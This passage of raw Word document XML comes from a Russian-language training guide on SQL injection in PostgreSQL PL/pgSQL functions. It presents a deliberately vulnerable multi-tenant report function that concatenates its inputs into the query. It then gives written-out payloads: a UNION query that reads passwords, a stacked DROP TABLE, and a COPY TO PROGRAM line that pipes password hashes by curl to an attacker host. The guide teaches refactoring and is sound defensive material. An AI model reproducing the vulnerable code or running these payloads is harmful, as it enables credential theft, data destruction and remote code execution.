        <w:t xml:space="preserve">explicit demonstration антипаттерна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + showing миграции на 3.16.1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format %I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) + 3.16.3 (USING). Цель — дать команде эталон для рефакторинга legacy plpgsql, где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-concat встречается массово.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код (полный пример со всеми ошибками).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Legacy функция, обхожаюющая «common pattern» 2010-х годов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Multi-tenant: каждый tenant имеет свою schema (tenant_&lt;id&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Функция используется для генерации reports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app.generate_report(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    report_table text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter_col text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter_value text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order_dir text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RETURNS SETOF record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sql_query text;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вся конструкция через ||</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql_query := 'SELECT * FROM tenant_' || tenant_id || '.' || report_table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              || ' WHERE ' || filter_col || ' = ''' || filter_value || ''''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              || ' ORDER BY id ' || order_dir;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RAISE NOTICE 'executing: %', sql_query;  -- для дебага (само по себе log-leak)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY EXECUTE sql_query;</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GRANT EXECUTE ON FUNCTION app.generate_report(text, text, text, text, text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--     TO reporting_role;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Четыре независимые injection-точки в одной функции:</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`tenant_id`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat в имя схемы → schema-injection</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`report_table`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat в имя таблицы → identifier-injection (классический R18)</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`filter_col`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat в имя колонки WHERE → identifier-injection</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`filter_value`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat в string-literal с одинарными кавычками → classic SQL injection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-escape</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`order_dir`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat в ORDER BY → injection в ORDER BY clause (3.14)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bonus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RAISE NOTICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пишет полный constructed SQL в server log — если log-файлы доступны attacker-у, payload visible permanently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — три варианта по каждой injection-точке</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — `filter_value` через quote-escape (классическая SQL injection):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">filter_value = "x' UNION SELECT password,1,2,3,4 FROM auth.users--"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Внутри функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sql_query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> собирается как:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM tenant_42.users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name = 'x' UNION SELECT password,1,2,3,4 FROM auth.users--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY id ASC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Стандартная UNION-injection (3.1) — атакующий читает passwords из auth.users-схемы. Граница с 3.16.1: здесь injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">value-position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (отсутствие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filter_value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), не identifier-position.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант B — `report_table` через identifier-injection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">report_table = "users; DROP TABLE audit_log; --"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM tenant_42.users; DROP TABLE audit_log; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name = '...' ORDER BY id ASC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-statement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SELECT возвращает rows (caller получает result), DROP исполняется. Если функция SECURITY DEFINER + owner=superuser — DROP исполняется под superuser, любая таблица в БД может быть удалена. Граница с 3.16.1: classic identifier-injection через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-style concat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант C — `tenant_id` через schema injection с COPY TO PROGRAM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id = "42; COPY (SELECT rolpassword FROM pg_authid) TO PROGRAM 'curl http://attacker/$(cat -|base64)'; --"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM tenant_42; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TO PROGRAM 'curl http://attacker/$(cat -|base64)'; --.users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name = '...' ORDER BY id ASC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если функция SECURITY DEFINER + owner=superuser +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или superuser у owner — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE через COPY TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.7.1). Все passwords уходят на attacker-server через HTTP. Это полный stacked-RCE-chain через identifier-injection в schema-position.</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(Variant C — полный SQL trace):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Caller-side:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM app.generate_report(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    '42; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     TO PROGRAM ''curl http://attacker/$(cat -|base64)''; --',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'users', 'name', 'foo', 'ASC'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
